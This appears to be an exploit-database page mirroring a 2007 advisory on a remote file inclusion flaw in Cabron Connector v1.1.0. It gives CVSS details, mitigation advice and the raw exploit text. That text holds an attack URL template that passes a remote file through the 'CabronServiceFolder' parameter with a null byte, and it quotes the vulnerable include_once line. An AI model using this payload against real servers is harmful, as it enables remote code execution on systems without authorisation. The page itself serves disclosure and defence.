header-logo
Suggest Exploit
vendor:
Cabron Connector
by:
Dj7xpl
7.5
CVSS
HIGH
Remote File Inclusion Vuln
CWE
Product Name: Cabron Connector
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Cabron Connector v1.1.0

The Cabron Connector v1.1.0 is vulnerable to remote file inclusion. The vulnerability can be exploited by providing a malicious input in the 'CabronServiceFolder' parameter in the 'inclusionService.php' file. This allows an attacker to include arbitrary files from remote servers.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate the input before using it in include statements. Additionally, it is advised to keep the software up to date with the latest patches and security updates.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                   Cabron Connector v1.1.0 
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :   Dj7xpl / Dj7xpl[at]Yahoo[dot]com
* Type :     Remote File Inclusion Vuln
* Download:  http://cabron.sourceforge.net
* Vuln:      http://[Target]/[Path]/services/samples/inclusionService.php?CabronServiceFolder=[EvilTxt]%00

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code: 
             include_once("$CabronServiceFolder/lib/includedFunction.php");   <== Line(1)

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-17]